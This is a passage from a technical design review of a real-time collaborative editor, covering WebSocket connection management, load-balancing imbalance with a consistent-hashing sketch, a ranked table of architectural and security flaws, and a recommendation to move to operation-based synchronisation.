ws.on('pong', () => { ws.isAlive = true; });
ws.on('close', () => this.removeConnection(ws));
ws.on('error', () => this.removeConnection(ws));
}
removeConnection(ws) {
const meta = this.connections.get(ws);
if (!meta) return;
this.connections.delete(ws);
// Remove from document subscribers
const subs = this.documentSubscribers.get(meta.documentId);
if (subs) {
subs.delete(ws);
// If no more subscribers for this document, clean up
if (subs.size === 0) {
this.documentSubscribers.delete(meta.documentId);
redis.unsubscribe(`doc:${meta.documentId}`);
// Unload OT engine after a grace period
// (in case someone reconnects quickly)
setTimeout(() => {
if (!this.documentSubscribers.has(meta.documentId)) {
documentEngines.delete(meta.documentId);
console.log(`Unloaded OT engine for doc ${meta.documentId}`);
}
}, 60000); // 60-second grace period
}
}
try { ws.terminate(); } catch (e) {}
}
// Run every 30 seconds: detect dead connections
startHeartbeat() {
setInterval(() => {
for (const [ws, meta] of this.connections) {
if (!ws.isAlive) {
  console.log(`Dead connection detected: user ${meta.user.id}`);
  this.removeConnection(ws);
  continue; // keep checking the remaining connections
}
ws.isAlive = false;
ws.ping(); // client must respond with pong within 30s
}
}, 30000);
}
}
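The broadcastToLocalClients helper used in section 1.1 is never defined; with the subscriber map above, a minimal sketch (the single module-level manager instance and the message shape are assumptions):
// Minimal sketch of the broadcastToLocalClients() helper used in section 1.1,
// assuming one module-level ConnectionManager instance per server process.
const connectionManager = new ConnectionManager();

function broadcastToLocalClients(documentId, change) {
  const subscribers = connectionManager.documentSubscribers.get(documentId);
  if (!subscribers) return;
  const payload = JSON.stringify({ type: 'remote-op', documentId, change });
  for (const ws of subscribers) {
    if (ws.readyState === 1) ws.send(payload); // 1 === OPEN; skip closing sockets
  }
}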
**7.1 Round-Robin Imbalance**
The Flaw: Round-robin assigns connections evenly at connection time, but WebSocket connections are long-lived. Over time, as servers are added/removed or connections have different lifetimes, load becomes severely unbalanced.
Scenario: Start with 2 servers, each gets 5000 connections.
Add server 3 for scaling.
Server 1: 5000 connections (existing, long-lived)
Server 2: 5000 connections (existing, long-lived)
Server 3: 0 connections (new, gets only NEW connections)
Round-robin sends new connections equally, but existing connections
don't rebalance. Server 3 is idle while 1 and 2 are overloaded.
The Solution: Least-connections routing + connection count awareness.
upstream api_servers {
# Use least_conn instead of round-robin for WebSocket connections
# This sends new connections to the server with fewest active connections
least_conn;
server api-1:3000;
server api-2:3000;
server api-3:3000;
}
# BUT: combine with consistent hashing for document routing (from 3.1)
# Use a two-tier approach:
# Tier 1: Document-to-server assignment (consistent hash)
# Tier 2: Within the assigned server, least-connections for load awareness
// Active rebalancing: when a new server joins, gradually migrate documents
async function rebalanceDocuments(newServerList) {
  const currentAssignments = await getDocumentAssignments();                  // Map<docId, server>
  const newAssignments = consistentHash(currentAssignments, newServerList);   // Map<docId, server>
  for (const [docId, newServer] of newAssignments) {
    const oldServer = currentAssignments.get(docId);
    if (oldServer !== newServer) {
      // Gracefully migrate: tell clients to reconnect to the new server
      await notifyClientsToReconnect(docId, newServer);
      // Stagger migrations to avoid a thundering herd
      await sleep(100);
    }
  }
}
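The consistentHash, getDocumentAssignments, and notifyClientsToReconnect helpers above are assumed. For illustration, a minimal hash-ring sketch that could back the document-to-server mapping; the virtual-node count and hash choice are arbitrary:
const crypto = require('crypto');

// Minimal consistent-hash ring sketch: maps documentId -> server so that
// adding or removing a server only remaps roughly 1/N of documents.
class HashRing {
  constructor(servers, virtualNodes = 100) {
    this.ring = []; // sorted array of { point, server }
    for (const server of servers) {
      for (let v = 0; v < virtualNodes; v++) {
        this.ring.push({ point: this.hash(`${server}#${v}`), server });
      }
    }
    this.ring.sort((a, b) => a.point - b.point);
  }
  hash(key) {
    // First 8 hex chars of md5 interpreted as an unsigned 32-bit integer
    return parseInt(crypto.createHash('md5').update(key).digest('hex').slice(0, 8), 16);
  }
  getServer(documentId) {
    const point = this.hash(documentId);
    // First ring entry clockwise from the key's point (linear scan; use binary search in production)
    const entry = this.ring.find(e => e.point >= point) || this.ring[0];
    return entry.server;
  }
}

// Example: const ring = new HashRing(['api-1:3000', 'api-2:3000', 'api-3:3000']);
//          ring.getServer(documentId) returns the server that should own this document.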
┌────┬──────────────────────────────────────┬──────────┬────────────┐
│ # │ Issue │ Severity │ Effort │
├────┼──────────────────────────────────────┼──────────┼────────────┤
│ 1 │ Last-write-wins destroys data (1.2) │ CRITICAL │ High │
│ 2 │ JWT in localStorage / XSS (4.1) │ CRITICAL │ Medium │
│ 3 │ No document authorization (4.3) │ CRITICAL │ Medium │
│ 4 │ 30s snapshot data loss (2.1) │ HIGH │ Medium │
│ 5 │ CDN caching API responses (5.1) │ HIGH │ Low │
│ 6 │ 2-second cross-server delay (1.1) │ HIGH │ Low │
│ 7 │ Client clock timestamps (1.3) │ HIGH │ Low │
│ 8 │ No reconnection handling (6.1) │ HIGH │ Medium │
│ 9 │ JWT no revocation (4.2) │ MEDIUM │ Medium │
│ 10 │ Split-brain document routing (3.1) │ MEDIUM │ Medium │
│ 11 │ HTML snapshot bloat/XSS (2.2) │ MEDIUM │ Medium │
│ 12 │ Org-based hot spots (3.3) │ MEDIUM │ Low │
│ 13 │ Read replica staleness (3.2) │ MEDIUM │ Medium │
│ 14 │ PG write bottleneck (2.3) │ LOW* │ High │
│ 15 │ WebSocket memory leaks (6.2) │ LOW* │ Medium │
│ 16 │ Round-robin imbalance (7.1) │ LOW* │ Low │
└────┴──────────────────────────────────────┴──────────┴────────────┘
* LOW at current scale, becomes HIGH at scale
The core issue is that this architecture treats a real-time collaborative editor like a traditional CRUD application. The fundamental shift needed is from state-based synchronization (snapshots, last-write-wins) to operation-based synchronization (OT/CRDTs, operation logs, event sourcing). That single conceptual change resolves the last-write-wins data loss (1.2), the client-clock ordering problem (1.3), the 30-second snapshot window (2.1), and the HTML snapshot issues (2.2) simultaneously.